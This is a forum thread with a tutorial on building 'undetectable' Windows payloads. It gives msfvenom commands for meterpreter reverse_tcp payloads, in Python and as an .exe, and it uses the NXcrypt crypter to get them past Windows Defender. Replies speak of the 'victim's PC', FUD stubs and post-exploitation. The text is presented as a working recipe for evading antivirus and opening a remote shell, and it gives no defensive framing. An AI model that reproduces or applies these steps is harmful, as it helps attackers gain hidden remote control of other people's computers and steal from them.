How To Create Undetectable Payload for Windows

ReDXsploit_Cyber · March 24, 2019, 12:21pm

Greetings everyone, hope you all are fine and shine. Recently hackersploit live streamed on how to actually manually embed payload(s) in apk. I see alot of people were asking for how to create undectectable payload for windows, and a few of them asked that windows defender is not allowing the the exe. So here’s the tutorial for those who needs it.

In this tutorial we will be using a tool called nxcrypt, which is python based and is written by Hadi Mene (h4d3s). The tool actually makes your payload undetectable

First thing first we have to create a payload first.
$sudo msfvenom --payload=python/meterpreter/reverse_tcp LHOST=(ip_here)
LPORT=(port_here) --out=(path_here)/payload.py
Now that was how to create payload. If you move this payload to windows
machine (like windows 10), it will delete it and detect it as it’s harmful.
Now you need to make this payload undetectable, to do that first we need a
a python script named as nxcrypt. This will make the payload undetectable.

GitHub - Hadi999/NXcrypt: NXcrypt - 'python backdoor' framework

STEPS TO MAKE PAYLOAD UNDETECTABLE
Once you have the nxcrypt, you can play around with it.
$sudo python nxcrypt.py --help (show the help menu)
There are very less options, so it’s pretty easy to understand.
Now to make payload undetectable simply type the following.
$sudo python nxcrypt.py /(path_of_payload) -f (path_to_save)

Now try to move the payload again to your windows machine, and you will find that it
will be no more detected.

Here is the video if you didn’t get it so = - YouTube

Thank You <3

Saito · March 24, 2019, 2:31pm

Hello
Just wanted to confirm, this method is to create undetectable payload for Windows.
I recently asked a question in the forum about which Crypter would be best to achieve a FUD stub for Windows.
Is this method focusing on the same?

Thanks for the information either way, cheers

HackerSploit · March 24, 2019, 7:43pm

Excellent guide, very much appreciated.

ReDXsploit_Cyber · March 24, 2019, 8:14pm

Thank you So much <3

MoNsTeR · March 24, 2019, 10:28pm

Hi @ReDXsploit_Cyber First off I want to thank you for taking the time to share this tutorial with us. I do have a question. Does this require the windows pc to have python installed to execute the .py file? In my experience python is not native to windows and would be a dependency. Undetectable in a folder on windows yes executing without python installed I could not get it to work. What is awesome is nxcrypt a new tool you introduced to me.

ReDXsploit_Cyber · March 25, 2019, 7:58am

Hello @MoNsTeR, it doesn’t require to have python installed (it’s actually .exe). well, I do use python in creating the payload but it’s not compulsory. You can use some other methods for creating payload and then pass it by nxcrypt, it will work fine. You can do it with this one as well.

$sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip_here) LPORT=(port_here) R > /(saving_path)/name.exe

Again python is not required in victim’s PC.
Thank You

MoNsTeR · March 25, 2019, 8:29pm

@ReDXsploit_Cyber Thanks for clarifying this for me to better understand. I was like how the heck is he getting meterpreter on windows with Python script.

Psickophant · March 28, 2019, 10:53am

Great Guide. Very helpful. We should make a combined effort and write up posts for other post-exploitation techniques. I am glad Alexis started this form for us to share and collaborate.